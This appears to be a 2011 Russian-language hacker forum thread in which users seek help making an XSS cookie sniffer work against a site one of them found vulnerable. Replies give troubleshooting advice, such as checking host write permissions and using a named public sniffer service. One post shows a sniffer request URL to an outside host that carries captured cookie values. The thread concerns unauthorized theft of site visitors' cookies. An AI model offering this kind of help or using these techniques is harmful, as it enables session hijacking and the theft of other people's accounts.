XSS атака - НУЖНА ПОМОЩЬ
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
XSS атака - НУЖНА ПОМОЩЬ - 2011-08-16 15:12:07.106666
|
|
|
покемон
Сообщений: 3
Оценки: 0
Присоединился: 2011-07-21 23:27:56.453333
|
всем доброго дня)
у меня такая проблема - я нашол xss уязвимость на сайте. далее вписываю свой код сниффера (сниффер с hacker-pro) произходит редирект на сайт который был запрограмирован (как и должно быть) значет всё работает. но отчёт на сниффер не приходит((
Пробувал с сниффером м@з@х@кера на localhost (отчёт не приходил) заливал на хост (отчёт не пришол)
ПОДСКАЖИТЕ в чём проблемаа. Заранее блогодарен))
|
|
|
|
|
RE: XSS атака - НУЖНА ПОМОЩЬ - 2011-08-24 13:42:47.006666
|
|
|
dima05605
Сообщений: 2
Оценки: 0
Присоединился: 2011-06-30 14:34:05.813333
|
а у меня кукисы не приходят на сниффер. помогите!
|
|
|
|
|
RE: XSS атака - НУЖНА ПОМОЩЬ - 2011-08-24 18:23:39.320000
|
|
|
dima05605
Сообщений: 2
Оценки: 0
Присоединился: 2011-06-30 14:34:05.813333
|
извините, что пишу здесь. ошибка на форуме когда топик создаю
|
|
|
|
|
RE: XSS атака - НУЖНА ПОМОЩЬ - 2011-08-26 11:13:49.930000
|
|
|
Аpathy^^
Сообщений: 504
Оценки: 10
Присоединился: 2011-08-02 18:35:14.340000
|
quote:
ORIGINAL: покемон
всем доброго дня)
у меня такая проблема - я нашол xss уязвимость на сайте. далее вписываю свой код сниффера (сниффер с hacker-pro) произходит редирект на сайт который был запрограмирован (как и должно быть) значет всё работает. но отчёт на сниффер не приходит((
Пробувал с сниффером м@з@х@кера на localhost (отчёт не приходил) заливал на хост (отчёт не пришол)
ПОДСКАЖИТЕ в чём проблемаа. Заранее блогодарен))
права на запись на хосте возможно не выставлены - самая распостраненная ошибка
попробуй сниффер hacker-pro.net для начала
|
|
|
|
|
RE: XSS атака - НУЖНА ПОМОЩЬ - 2011-08-26 23:45:01.550000
|
|
|
покемон
Сообщений: 3
Оценки: 0
Присоединился: 2011-07-21 23:27:56.453333
|
дааа.я разобрался со своей проблемой.НО НЕ ДО КОНЦА…
пользуясь сниффером от hacker-pro всё работает. Ставлю этот код:
Код для пассивной XSS атаки [ Вставлять после "> ]
- Но понимаете, вот что меня не устраивает:
1. во первых не произходит редирект (не знаю как это исправить [:(] )
2. после того как вставляю код сниффера на XSS код, высвечиавет в URL вот такая строка:
http://httpz.ru/nbvdva6wzyj.gif?__utma=1.1454162384.1314387668.1314387668.1314387668.1; __utmz=1.1314387668.1.1.utmcsr=(direct) и т.д
обьясните плз…что за строка такая и откуда эти _utmz в моих куках
заранее благодарен))
|
|
|
|
|
RE: XSS атака - НУЖНА ПОМОЩЬ - 2011-09-04 19:34:45.483333
|
|
|
bob3r
Сообщений: 67
Оценки: 0
Присоединился: 2011-06-03 02:30:17.840000
|
_utmz - это куки корпорации добра, которая следит за всеми (их тайный смысл мне не известен).
Многие используют счетчики гугла, а они ставят такие куки.
|
|
|
|
|
|
